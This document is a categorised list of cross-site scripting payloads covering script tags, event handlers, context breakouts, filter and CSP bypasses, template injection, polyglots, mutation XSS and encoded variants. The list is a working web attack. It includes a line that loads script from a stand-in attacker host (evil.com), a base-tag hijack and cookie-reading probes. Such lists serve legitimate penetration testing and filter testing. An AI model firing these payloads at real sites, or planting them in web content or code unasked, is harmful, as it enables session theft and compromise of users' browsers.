# Comprehensive XSS Payloads

# Basic script tags
<script>alert(1)</script>
<script>alert('XSS')</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>

# Event handlers - img
<img src=x onerror=alert(1)>
<img src=x onerror=alert('XSS')>
<img/src=x onerror=alert(1)>
<img src="x" onerror="alert(1)">

# Event handlers - svg
<svg onload=alert(1)>
<svg/onload=alert(1)>
<svg onload=alert('XSS')>
<svg><script>alert(1)</script></svg>

# Event handlers - body
<body onload=alert(1)>
<body onpageshow=alert(1)>

# Event handlers - other
<iframe onload=alert(1)>
<input onfocus=alert(1) autofocus>
<select onfocus=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
<details open ontoggle=alert(1)>

# JavaScript URIs
javascript:alert(1)
javascript:alert('XSS')
javascript:alert(document.domain)

# Event handlers in attributes
" onfocus="alert(1)" autofocus="
' onfocus='alert(1)' autofocus='
" onmouseover="alert(1)" a="
' onclick='alert(1)'

# Breaking out of context
"><script>alert(1)</script>
'><script>alert(1)</script>
</script><script>alert(1)</script>
</title><script>alert(1)</script>
</textarea><script>alert(1)</script>

# Filter bypass - case manipulation
<ScRiPt>alert(1)</ScRiPt>
<IMG SRC=x OnErRoR=alert(1)>
<SVG ONLOAD=alert(1)>

# Filter bypass - encoding
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>
<script>&#97;&#108;&#101;&#114;&#116;(1)</script>
<script>\u0061lert(1)</script>
<script>\x61lert(1)</script>

# Filter bypass - without parentheses
<script>alert`1`</script>
<script>onerror=alert;throw 1</script>
<img src=x onerror=alert`1`>

# Filter bypass - without spaces
<svg/onload=alert(1)>
<img/src=x/onerror=alert(1)>
<script/src=//evil.com/x.js>

# Filter bypass - tab/newline
<img	src=x	onerror=alert(1)>
<img
src=x
onerror=alert(1)>
<svg
onload=alert(1)>

# DOM XSS
#<script>alert(1)</script>
#javascript:alert(1)
"><img src=x onerror=alert(location.hash)>

# Template injection (Angular/Vue)
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{toString().constructor.prototype.charAt=[].join;$eval('x]alert(1)//');}}

# CSP bypass attempts
<script src='https://accounts.google.com/o/oauth2/revoke?callback=alert(1)'></script>
<base href='https://evil.com'>
<object data='javascript:alert(1)'>
<iframe srcdoc='<script>alert(1)</script>'>

# Polyglots
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)>
'-alert(1)-'

# Data URI
<a href="data:text/html,<script>alert(1)</script>">click</a>
<iframe src="data:text/html,<script>alert(1)</script>">

# SVG advanced
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
<svg><set onbegin=alert(1) attributeName=x>
<svg><a><rect width=100% height=100% onclick=alert(1)></rect></a></svg>

# Mutation XSS
<noscript><p title="</noscript><script>alert(1)</script>">
<p id="</p><script>alert(1)</script>">

# Character encoding bypass
%3Cscript%3Ealert(1)%3C/script%3E
%253Cscript%253Ealert(1)%253C%252Fscript%253E
